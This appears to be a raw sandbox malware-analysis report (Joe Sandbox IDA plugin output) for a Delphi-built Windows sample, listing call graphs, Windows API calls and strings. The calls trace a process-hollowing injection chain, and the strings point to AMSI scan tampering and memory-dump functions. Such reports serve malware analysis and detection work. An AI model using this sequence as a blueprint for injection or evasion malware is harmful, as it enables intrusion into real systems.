API calls 37551->37552 37554 2b29bcc 37552->37554 37555 2b298c5 37553->37555 37556 2b289d0 20 API calls 37554->37556 37557 2b289d0 20 API calls 37555->37557 37558 2b29b78 37556->37558 37559 2b298e9 37557->37559 37560 2b14860 11 API calls 37558->37560 37561 2b14860 11 API calls 37559->37561 37563 2b29c0c 37560->37563 37562 2b29905 37561->37562 37564 2b147ec 11 API calls 37562->37564 37565 2b147ec 11 API calls 37563->37565 37567 2b29936 37564->37567 37566 2b29c3d 37565->37566 37568 2b289d0 20 API calls 37566->37568 37569 2b289d0 20 API calls 37567->37569 37570 2b29c61 37568->37570 37571 2b2995a 37569->37571 37572 2b14860 11 API calls 37570->37572 37573 2b14860 11 API calls 37571->37573 37574 2b29c7d 37572->37574 37575 2b29976 37573->37575 37577 2b147ec 11 API calls 37574->37577 37576 2b147ec 11 API calls 37575->37576 37579 2b299a7 37576->37579 37578 2b29cae 37577->37578 37580 2b289d0 20 API calls 37578->37580 37581 2b289d0 20 API calls 37579->37581 37582 2b29cd2 37580->37582 37583 2b299cb 37581->37583 37584 2b14860 11 API calls 37582->37584 37846 2b28670 37583->37846 37591 2b29cee 37584->37591 37587 2b299e3 37589 2b27a2c 18 API calls 37587->37589 37588 2b29a0b 37590 2b14860 11 API calls 37588->37590 37592 2b29a04 37589->37592 37595 2b29a27 37590->37595 37593 2b147ec 11 API calls 37591->37593 37594 2b14860 11 API calls 37592->37594 37598 2b29d1f 37593->37598 37597 2b29a98 37594->37597 37596 2b147ec 11 API calls 37595->37596 37602 2b29a58 37596->37602 37600 2b147ec 11 API calls 37597->37600 37599 2b289d0 20 API calls 37598->37599 37601 2b29d43 37599->37601 37606 2b29ac9 37600->37606 37603 2b27a2c 18 API calls 37601->37603 37605 2b289d0 20 API calls 37602->37605 37604 2b29d64 37603->37604 37604->37396 37607 2b14860 11 API calls 37604->37607 37605->37592 37608 2b289d0 20 API calls 37606->37608 37611 2b29d92 37607->37611 37609 2b29aed 37608->37609 37610 2b14860 11 API calls 37609->37610 37613 2b29b09 37610->37613 37612 2b147ec 11 API calls 37611->37612 37615 2b29dc3 
37612->37615 37614 2b147ec 11 API calls 37613->37614 37618 2b29b3a 37614->37618 37616 2b289d0 20 API calls 37615->37616 37617 2b29de7 37616->37617 37619 2b14860 11 API calls 37617->37619 37620 2b289d0 20 API calls 37618->37620 37623 2b29e03 37619->37623 37621 2b29b5e 37620->37621 37860 2b27a2c 37621->37860 37624 2b147ec 11 API calls 37623->37624 37625 2b29e34 37624->37625 37626 2b289d0 20 API calls 37625->37626 37627 2b29e58 37626->37627 37874 2b28c80 37627->37874 37629 2b14860 11 API calls 37631 2b29edf 37629->37631 37630 2b29e5f 37630->37629 37632 2b147ec 11 API calls 37631->37632 37633 2b29f10 37632->37633 37634 2b289d0 20 API calls 37633->37634 37635 2b29f34 37634->37635 37636 2b14860 11 API calls 37635->37636 37637 2b29f50 37636->37637 37638 2b147ec 11 API calls 37637->37638 37639 2b29f81 37638->37639 37640 2b289d0 20 API calls 37639->37640 37641 2b29fa5 37640->37641 37642 2b14860 11 API calls 37641->37642 37643 2b29fc1 37642->37643 37644 2b147ec 11 API calls 37643->37644 37645 2b29ff2 37644->37645 37646 2b289d0 20 API calls 37645->37646 37647 2b2a016 37646->37647 37648 2b27d78 18 API calls 37647->37648 37649 2b2a033 37648->37649 37650 2b14860 11 API calls 37649->37650 37651 2b2a04f 37650->37651 37652 2b147ec 11 API calls 37651->37652 37653 2b2a080 37652->37653 37654 2b289d0 20 API calls 37653->37654 37655 2b2a0a4 37654->37655 37656 2b14860 11 API calls 37655->37656 37657 2b2a0c0 37656->37657 37658 2b147ec 11 API calls 37657->37658 37659 2b2a0f1 37658->37659 37660 2b289d0 20 API calls 37659->37660 37661 2b2a115 37660->37661 37662 2b14860 11 API calls 37661->37662 37663 2b2a131 37662->37663 37664 2b147ec 11 API calls 37663->37664 37665 2b2a162 37664->37665 37666 2b289d0 20 API calls 37665->37666 37667 2b2a186 37666->37667 37668 2b27d78 18 API calls 37667->37668 37669 2b2a1a6 37668->37669 37670 2b14860 11 API calls 37669->37670 37671 2b2a1c2 37670->37671 37672 2b147ec 11 API calls 37671->37672 37673 2b2a1f3 37672->37673 37674 2b289d0 20 API calls 37673->37674 
37675 2b2a217 37674->37675 37676 2b14860 11 API calls 37675->37676 37677 2b2a233 37676->37677 37678 2b147ec 11 API calls 37677->37678 37679 2b2a264 37678->37679 37680 2b289d0 20 API calls 37679->37680 37681 2b2a288 37680->37681 37682 2b14860 11 API calls 37681->37682 37683 2b2a2a4 37682->37683 37684 2b147ec 11 API calls 37683->37684 37685 2b2a2d5 37684->37685 37686 2b289d0 20 API calls 37685->37686 37687 2b2a2f9 SetThreadContext NtResumeThread 37686->37687 37688 2b14860 11 API calls 37687->37688 37689 2b2a345 37688->37689 37690 2b147ec 11 API calls 37689->37690 37691 2b2a376 37690->37691 37692 2b289d0 20 API calls 37691->37692 37693 2b2a39a 37692->37693 37694 2b14860 11 API calls 37693->37694 37695 2b2a3b6 37694->37695 37696 2b147ec 11 API calls 37695->37696 37697 2b2a3e7 37696->37697 37698 2b289d0 20 API calls 37697->37698 37699 2b2a40b 37698->37699 37700 2b14860 11 API calls 37699->37700 37701 2b2a427 37700->37701 37702 2b147ec 11 API calls 37701->37702 37703 2b2a458 37702->37703 37704 2b289d0 20 API calls 37703->37704 37705 2b2a47c 37704->37705 37706 2b14860 11 API calls 37705->37706 37707 2b2a498 37706->37707 37708 2b147ec 11 API calls 37707->37708 37709 2b2a4c9 37708->37709 37710 2b289d0 20 API calls 37709->37710 37711 2b2a4ed 37710->37711 37712 2b12c2c 11 API calls 37711->37712 37713 2b2a4fc 37712->37713 37714 2b14860 11 API calls 37713->37714 37715 2b2a51e 37714->37715 37716 2b147ec 11 API calls 37715->37716 37717 2b2a54f 37716->37717 37718 2b289d0 20 API calls 37717->37718 37719 2b2a573 37718->37719 37720 2b2894c 21 API calls 37719->37720 37721 2b2a587 37720->37721 37722 2b2894c 21 API calls 37721->37722 37723 2b2a59b 37722->37723 37724 2b2894c 21 API calls 37723->37724 37725 2b2a5af 37724->37725 37726 2b14860 11 API calls 37725->37726 37727 2b2a5cb 37726->37727 37728 2b147ec 11 API calls 37727->37728 37729 2b2a5fc 37728->37729 37730 2b289d0 20 API calls 37729->37730 37731 2b2a620 37730->37731 37732 2b2894c 21 API calls 37731->37732 37733 2b2a634 
37732->37733 37734 2b2894c 21 API calls 37733->37734 37735 2b2a648 37734->37735 37736 2b14860 11 API calls 37735->37736 37737 2b2a664 37736->37737 37738 2b147ec 11 API calls 37737->37738 37739 2b2a682 37738->37739 37740 2b2894c 21 API calls 37739->37740 37741 2b2a69a 37740->37741 37742 2b14860 11 API calls 37741->37742 37743 2b2a6b6 37742->37743 37744 2b147ec 11 API calls 37743->37744 37745 2b2a6d4 37744->37745 37746 2b2894c 21 API calls 37745->37746 37747 2b2a6ec 37746->37747 37748 2b2894c 21 API calls 37747->37748 37749 2b2a700 37748->37749 37750 2b2894c 21 API calls 37749->37750 37751 2b2a714 37750->37751 37752 2b2894c 21 API calls 37751->37752 37753 2b2a728 37752->37753 37754 2b2894c 21 API calls 37753->37754 37755 2b2a73c 37754->37755 37756 2b14860 11 API calls 37755->37756 37757 2b2a758 37756->37757 37758 2b147ec 11 API calls 37757->37758 37759 2b2a776 37758->37759 37760 2b2894c 21 API calls 37759->37760 37761 2b2a78e 37760->37761 37762 2b14860 11 API calls 37761->37762 37763 2b2a7aa 37762->37763 37764 2b147ec 11 API calls 37763->37764 37765 2b2a7c8 37764->37765 37766 2b2894c 21 API calls 37765->37766 37767 2b2a7e0 37766->37767 37768 2b14860 11 API calls 37767->37768 37769 2b2a7fc 37768->37769 37770 2b147ec 11 API calls 37769->37770 37771 2b2a81a 37770->37771 37772 2b2894c 21 API calls 37771->37772 37773 2b2a832 37772->37773 37774 2b14860 11 API calls 37773->37774 37775 2b2a84e 37774->37775 37776 2b147ec 11 API calls 37775->37776 37777 2b2a86c 37776->37777 37778 2b2894c 21 API calls 37777->37778 37779 2b2a884 37778->37779 37780 2b2894c 21 API calls 37779->37780 37781 2b2a8a3 37780->37781 37782 2b2894c 21 API calls 37781->37782 37782->37396 37784 2b14530 11 API calls 37783->37784 37785 2b285df 37784->37785 37786 2b14860 11 API calls 37785->37786 37787 2b285fe 37786->37787 37788 2b281cc 17 API calls 37787->37788 37789 2b28611 37788->37789 37790 2b28274 15 API calls 37789->37790 37791 2b28617 WinExec 37790->37791 37792 2b28639 37791->37792 37793 2b144dc 11 API 
calls 37792->37793 37794 2b28641 37793->37794 37794->36637 37795->36696 37796->36853 37797->36906 37798->37030 37799->36860 37800->36953 37802 2b28973 GetProcAddress 37801->37802 37803 2b289bb 37801->37803 37804 2b289b0 FreeLibrary 37802->37804 37805 2b2898d 37802->37805 37803->37153 37804->37803 37806 2b27d78 18 API calls 37805->37806 37807 2b289a5 37806->37807 37807->37804 37808->37346 37809->37346 37811 2b149a4 GetFileAttributesA 37810->37811 37811->37355 37813 2b14f26 SysAllocStringLen 37812->37813 37814 2b14f3c 37812->37814 37813->37814 37815 2b14c30 37813->37815 37814->37364 37815->37812 37816->37367 37818 2b14c74 37817->37818 37819 2b14c66 SysFreeString 37817->37819 37818->37374 37819->37818 37821 2b14530 11 API calls 37820->37821 37822 2b287ab 37821->37822 37823 2b14860 11 API calls 37822->37823 37824 2b287ca 37823->37824 37825 2b281cc 17 API calls 37824->37825 37826 2b287dd 37825->37826 37827 2b28274 15 API calls 37826->37827 37828 2b287e3 CreateProcessAsUserW 37827->37828 37829 2b28827 37828->37829 37830 2b144dc 11 API calls 37829->37830 37831 2b2882f 37830->37831 37831->37467 37831->37469 37833 2b14530 11 API calls 37832->37833 37834 2b28425 37833->37834 37835 2b2798c 12 API calls 37834->37835 37836 2b28432 37835->37836 37837 2b147ec 11 API calls 37836->37837 37838 2b2843f 37837->37838 37839 2b281cc 17 API calls 37838->37839 37840 2b28452 37839->37840 37841 2b28274 15 API calls 37840->37841 37842 2b28458 NtReadVirtualMemory 37841->37842 37843 2b28486 37842->37843 37844 2b14500 11 API calls 37843->37844 37845 2b28493 37844->37845 37845->37546 37845->37547 37847 2b14530 11 API calls 37846->37847 37848 2b28695 37847->37848 37849 2b2798c 12 API calls 37848->37849 37850 2b286a2 37849->37850 37851 2b147ec 11 API calls 37850->37851 37852 2b286af 37851->37852 37853 2b281cc 17 API calls 37852->37853 37854 2b286c2 37853->37854 37855 2b28274 15 API calls 37854->37855 37856 2b286c8 NtUnmapViewOfSection 37855->37856 37857 2b286e8 37856->37857 37858 2b14500 11 API 
calls 37857->37858 37859 2b286f5 37858->37859 37859->37587 37859->37588 37861 2b14530 11 API calls 37860->37861 37862 2b27a51 37861->37862 37863 2b2798c 12 API calls 37862->37863 37864 2b27a5e 37863->37864 37865 2b147ec 11 API calls 37864->37865 37866 2b27a6b 37865->37866 37867 2b281cc 17 API calls 37866->37867 37868 2b27a7e 37867->37868 37869 2b28274 15 API calls 37868->37869 37870 2b27a84 NtAllocateVirtualMemory 37869->37870 37871 2b27ab5 37870->37871 37872 2b14500 11 API calls 37871->37872 37873 2b27ac2 37872->37873 37873->37558 37875 2b12c10 11 API calls 37874->37875 37876 2b28cb6 37875->37876 37876->37630 37877 2b14edc 37878 2b14ee9 37877->37878 37882 2b14ef0 37877->37882 37883 2b14c38 37878->37883 37889 2b14c50 37882->37889 37884 2b14c4c 37883->37884 37885 2b14c3c SysAllocStringLen 37883->37885 37884->37882 37885->37884 37886 2b14c30 37885->37886 37887 2b14f26 SysAllocStringLen 37886->37887 37888 2b14f3c 37886->37888 37887->37886 37887->37888 37888->37882 37890 2b14c56 SysFreeString 37889->37890 37891 2b14c5c 37889->37891 37890->37891 37892 2b11c6c 37893 2b11d04 37892->37893 37894 2b11c7c 37892->37894 37897 2b11f58 37893->37897 37898 2b11d0d 37893->37898 37895 2b11cc0 37894->37895 37896 2b11c89 37894->37896 37903 2b11724 10 API calls 37895->37903 37899 2b11c94 37896->37899 37940 2b11724 37896->37940 37900 2b11fec 37897->37900 37905 2b11f68 37897->37905 37906 2b11fac 37897->37906 37901 2b11d25 37898->37901 37902 2b11e24 37898->37902 37907 2b11d2c 37901->37907 37912 2b11d48 37901->37912 37914 2b11dfc 37901->37914 37918 2b11e55 Sleep 37902->37918 37919 2b11e7c 37902->37919 37920 2b11e95 37902->37920 37908 2b11cd7 37903->37908 37910 2b11724 10 API calls 37905->37910 37909 2b11fb2 37906->37909 37913 2b11724 10 API calls 37906->37913 37927 2b11a8c 8 API calls 37908->37927 37930 2b11cfd 37908->37930 37931 2b11f82 37910->37931 37911 2b11724 10 API calls 37929 2b11f2c 37911->37929 37921 2b11d79 Sleep 37912->37921 37923 2b11d9c 37912->37923 37932 2b11fc1 37913->37932 
37916 2b11724 10 API calls 37914->37916 37915 2b11ca1 37928 2b11cb9 37915->37928 37964 2b11a8c 37915->37964 37934 2b11e05 37916->37934 37917 2b11fa7 37918->37919 37924 2b11e6f Sleep 37918->37924 37919->37911 37919->37920 37922 2b11d91 Sleep 37921->37922 37921->37923 37922->37912 37924->37902 37926 2b11e1d 37927->37930 37929->37920 37933 2b11a8c 8 API calls 37929->37933 37931->37917 37935 2b11a8c 8 API calls 37931->37935 37932->37917 37936 2b11a8c 8 API calls 37932->37936 37937 2b11f50 37933->37937 37934->37926 37938 2b11a8c 8 API calls 37934->37938 37935->37917 37939 2b11fe4 37936->37939 37938->37926 37941 2b11968 37940->37941 37942 2b1173c 37940->37942 37943 2b11a80 37941->37943 37944 2b11938 37941->37944 37951 2b117cb Sleep 37942->37951 37952 2b1174e 37942->37952 37945 2b11684 VirtualAlloc 37943->37945 37946 2b11a89 37943->37946 37950 2b11947 Sleep 37944->37950 37957 2b11986 37944->37957 37948 2b116bf 37945->37948 37949 2b116af 37945->37949 37946->37915 37947 2b1175d 37947->37915 37948->37915 37981 2b11644 37949->37981 37954 2b1195d Sleep 37950->37954 37950->37957 37951->37952 37955 2b117e4 Sleep 37951->37955 37952->37947 37958 2b1180a Sleep 37952->37958 37961 2b1182c 37952->37961 37954->37944 37955->37942 37956 2b119a4 37956->37915 37957->37956 37959 2b115cc VirtualAlloc 37957->37959 37960 2b11820 Sleep 37958->37960 37958->37961 37959->37956 37960->37952 37963 2b11838 37961->37963 37987 2b115cc 37961->37987 37963->37915 37965 2b11aa1 37964->37965 37966 2b11b6c 37964->37966 37968 2b11aa7 37965->37968 37969 2b11b13 Sleep 37965->37969 37967 2b116e8 37966->37967 37966->37968 37971 2b11c66 37967->37971 37974 2b11644 2 API calls 37967->37974 37970 2b11ab0 37968->37970 37973 2b11b4b Sleep 37968->37973 37978 2b11b81 37968->37978 37969->37968 37972 2b11b2d Sleep 37969->37972 37970->37928 37971->37928 37972->37965 37976 2b11b61 Sleep 37973->37976 37973->37978 37975 2b116f5 VirtualFree 37974->37975 37977 2b1170d 37975->37977 37976->37968 37977->37928 37979 2b11c00 
VirtualFree 37978->37979 37980 2b11ba4 37978->37980 37979->37928 37980->37928 37982 2b11681 37981->37982 37983 2b1164d 37981->37983 37982->37948 37983->37982 37984 2b1164f Sleep 37983->37984 37985 2b11664 37984->37985 37985->37982 37986 2b11668 Sleep 37985->37986 37986->37983 37991 2b11560 37987->37991 37989 2b115d4 VirtualAlloc 37990 2b115eb 37989->37990 37990->37963 37992 2b11500 37991->37992 37992->37989 37993 2b3d2fc 38003 2b1656c 37993->38003 37997 2b3d32a 38008 2b3c35c timeSetEvent 37997->38008 37999 2b3d334 38000 2b3d342 GetMessageA 37999->38000 38001 2b3d352 38000->38001 38002 2b3d336 TranslateMessage DispatchMessageA 38000->38002 38002->38000 38004 2b16577 38003->38004 38009 2b14198 38004->38009 38007 2b142ac SysFreeString SysReAllocStringLen SysAllocStringLen 38007->37997 38008->37999 38010 2b141de 38009->38010 38011 2b14257 38010->38011 38012 2b143e8 38010->38012 38023 2b14130 38011->38023 38015 2b14419 38012->38015 38016 2b1442a 38012->38016 38028 2b1435c GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 38015->38028 38019 2b1446f FreeLibrary 38016->38019 38020 2b14493 38016->38020 38018 2b14423 38018->38016 38019->38016 38021 2b144a2 ExitProcess 38020->38021 38022 2b1449c 38020->38022 38022->38021 38024 2b14173 38023->38024 38025 2b14140 38023->38025 38024->38007 38025->38024 38027 2b115cc VirtualAlloc 38025->38027 38029 2b15868 38025->38029 38027->38025 38028->38018 38030 2b15878 GetModuleFileNameA 38029->38030 38032 2b15894 38029->38032 38033 2b15acc GetModuleFileNameA RegOpenKeyExA 38030->38033 38032->38025 38034 2b15b4f 38033->38034 38035 2b15b0f RegOpenKeyExA 38033->38035 38051 2b15908 12 API calls 38034->38051 38035->38034 38036 2b15b2d RegOpenKeyExA 38035->38036 38036->38034 38038 2b15bd8 lstrcpynA GetThreadLocale GetLocaleInfoA 38036->38038 38042 2b15cf2 38038->38042 38043 2b15c0f 38038->38043 38039 2b15b74 RegQueryValueExA 38040 2b15b94 RegQueryValueExA 38039->38040 38041 2b15bb2 RegCloseKey 38039->38041 38040->38041 38041->38032 
38042->38032 38043->38042 38044 2b15c1f lstrlenA 38043->38044 38046 2b15c37 38044->38046 38046->38042 38047 2b15c84 38046->38047 38048 2b15c5c lstrcpynA LoadLibraryExA 38046->38048 38047->38042 38049 2b15c8e lstrcpynA LoadLibraryExA 38047->38049 38048->38047 38049->38042 38050 2b15cc0 lstrcpynA LoadLibraryExA 38049->38050 38050->38042 38051->38039

Control-flow Graph

[Graph for the function starting at 2b28d70; image not reproduced. Legend: Executed / Not Executed.]
APIs
  • Part of subcall function 02B289D0: FreeLibrary.KERNEL32(75380000,00000000,00000000,00000000,00000000,02B9738C,Function_0000662C,00000004,02B9739C,02B9738C,05F5E103,00000040,02B973A0,75380000,00000000,00000000), ref: 02B28AAA
  • Part of subcall function 02B28788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02B28814
• GetThreadContext.KERNEL32(0000086C,02B97424,ScanString,02B973A8,02B2A93C,UacInitialize,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,UacInitialize,02B973A8), ref: 02B29602
  • Part of subcall function 02B28400: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B28471
  • Part of subcall function 02B28670: NtUnmapViewOfSection.NTDLL(?,?), ref: 02B286D5
  • Part of subcall function 02B27A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B27A9F
  • Part of subcall function 02B27D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B27DEC
• SetThreadContext.KERNEL32(0000086C,02B97424,ScanBuffer,02B973A8,02B2A93C,ScanString,02B973A8,02B2A93C,Initialize,02B973A8,02B2A93C,00000870,003EAFF8,02B974FC,00000004,02B97500), ref: 02B2A317
• NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(0000086C,00000000,0000086C,02B97424,ScanBuffer,02B973A8,02B2A93C,ScanString,02B973A8,02B2A93C,Initialize,02B973A8,02B2A93C,00000870,003EAFF8,02B974FC), ref: 02B2A324
  • Part of subcall function 02B2894C: LoadLibraryW.KERNEL32(bcrypt,?,0000086C,00000000,02B973A8,02B2A587,ScanString,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,Initialize,02B973A8,02B2A93C,UacScan), ref: 02B28960
  • Part of subcall function 02B2894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B2897A
                                                                                                                    • Part of subcall function 02B2894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,0000086C,00000000,02B973A8,02B2A587,ScanString,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,Initialize), ref: 02B289B6
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LibraryMemoryThreadVirtual$ContextFree$AddressAllocateCreateLoadProcProcessReadResumeSectionUnmapUserViewWrite
                                                                                                                  • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                  • API String ID: 2388221946-51457883
                                                                                                                  • Opcode ID: 720860bb1234922ffa36ce8f489cf3a1d048504d3dea43fbd1c7f3f99b40de82
                                                                                                                  • Instruction ID: d31b7ef75b706298cf3e94f47eca147920a51754cd1f8958eb4517a3c0f01932
                                                                                                                  • Opcode Fuzzy Hash: 720860bb1234922ffa36ce8f489cf3a1d048504d3dea43fbd1c7f3f99b40de82
                                                                                                                  • Instruction Fuzzy Hash: 30E2E175A502289FDB11FB64DD80BCE73BAAF85300F9041F1E149AB215DE30AE89DF56

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02B289D0: FreeLibrary.KERNEL32(75380000,00000000,00000000,00000000,00000000,02B9738C,Function_0000662C,00000004,02B9739C,02B9738C,05F5E103,00000040,02B973A0,75380000,00000000,00000000), ref: 02B28AAA
                                                                                                                    • Part of subcall function 02B28788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02B28814
                                                                                                                  • GetThreadContext.KERNEL32(0000086C,02B97424,ScanString,02B973A8,02B2A93C,UacInitialize,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,UacInitialize,02B973A8), ref: 02B29602
                                                                                                                    • Part of subcall function 02B28400: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B28471
                                                                                                                    • Part of subcall function 02B28670: NtUnmapViewOfSection.NTDLL(?,?), ref: 02B286D5
                                                                                                                    • Part of subcall function 02B27A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B27A9F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MemoryVirtual$AllocateContextCreateFreeLibraryProcessReadSectionThreadUnmapUserView
                                                                                                                  • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                  • API String ID: 3386062106-51457883
                                                                                                                  • Opcode ID: 72212119afbe153ccbdaaa360a80b64b4f411aa58c908872cd98406c1fe6e596
                                                                                                                  • Instruction ID: b3f93cdda9a590f44b4faf4aaec77923743a965370e8e6dd3ad7c23c9ac1f0af
                                                                                                                  • Opcode Fuzzy Hash: 72212119afbe153ccbdaaa360a80b64b4f411aa58c908872cd98406c1fe6e596
                                                                                                                  • Instruction Fuzzy Hash: 4CE2D175A502289FDB11FB64DD80BCE73BAEF85300F9041E1E149AB215DE30AE89DF56

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 10945 2b15acc-2b15b0d GetModuleFileNameA RegOpenKeyExA 10946 2b15b4f-2b15b92 call 2b15908 RegQueryValueExA 10945->10946 10947 2b15b0f-2b15b2b RegOpenKeyExA 10945->10947 10952 2b15b94-2b15bb0 RegQueryValueExA 10946->10952 10953 2b15bb6-2b15bd0 RegCloseKey 10946->10953 10947->10946 10948 2b15b2d-2b15b49 RegOpenKeyExA 10947->10948 10948->10946 10950 2b15bd8-2b15c09 lstrcpynA GetThreadLocale GetLocaleInfoA 10948->10950 10954 2b15cf2-2b15cf9 10950->10954 10955 2b15c0f-2b15c13 10950->10955 10952->10953 10958 2b15bb2 10952->10958 10956 2b15c15-2b15c19 10955->10956 10957 2b15c1f-2b15c35 lstrlenA 10955->10957 10956->10954 10956->10957 10960 2b15c38-2b15c3b 10957->10960 10958->10953 10961 2b15c47-2b15c4f 10960->10961 10962 2b15c3d-2b15c45 10960->10962 10961->10954 10964 2b15c55-2b15c5a 10961->10964 10962->10961 10963 2b15c37 10962->10963 10963->10960 10965 2b15c84-2b15c86 10964->10965 10966 2b15c5c-2b15c82 lstrcpynA LoadLibraryExA 10964->10966 10965->10954 10967 2b15c88-2b15c8c 10965->10967 10966->10965 10967->10954 10968 2b15c8e-2b15cbe lstrcpynA LoadLibraryExA 10967->10968 10968->10954 10969 2b15cc0-2b15cf0 lstrcpynA LoadLibraryExA 10968->10969 10969->10954
                                                                                                                  APIs
                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02B10000,02B3E790), ref: 02B15AE8
                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B10000,02B3E790), ref: 02B15B06
                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B10000,02B3E790), ref: 02B15B24
                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02B15B42
                                                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02B15BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02B15B8B
                                                                                                                  • RegQueryValueExA.ADVAPI32(?,02B15D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02B15BD1,?,80000001), ref: 02B15BA9
                                                                                                                  • RegCloseKey.ADVAPI32(?,02B15BD8,00000000,?,?,00000000,02B15BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02B15BCB
                                                                                                                  • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02B15BE8
                                                                                                                  • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02B15BF5
                                                                                                                  • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02B15BFB
                                                                                                                  • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02B15C26
                                                                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B15C6D
                                                                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B15C7D
                                                                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B15CA5
                                                                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B15CB5
